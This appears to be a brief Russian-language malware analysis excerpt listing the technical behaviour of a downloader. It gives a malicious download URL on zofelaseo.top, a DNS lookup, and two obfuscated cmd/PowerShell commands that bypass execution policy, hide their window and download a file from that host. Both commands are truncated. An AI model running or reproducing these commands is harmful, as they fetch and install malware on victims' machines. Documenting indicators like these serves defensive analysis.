Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^WErs^HEll.exe -ex^ECUT^I^O^NpOLICY BypAss -^N^Opro^FiLe -^WInDoW^s^tYL^E H^i^D^d^EN (^neW-OBj^Ect s^YST^E^M^.^Net.^WeBClIeNT).^DoWN^L^o^AdfI^LE(^'http://zofelaseo.top/read.p...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /C "PO^WErs^HEll.exe -ex^ECUT^I^O^NpOLICY BypAss -^N^Opro^FiLe -^WInDoW^s^tYL^E H^i^D^d^EN (^neW-OBj^Ect s^YST^E^M^.^Net.^WeBClIeNT).^DoWN^L^o^AdfI^LE(^'http://zofelaseo.top/read.p...' (со скрытым окном)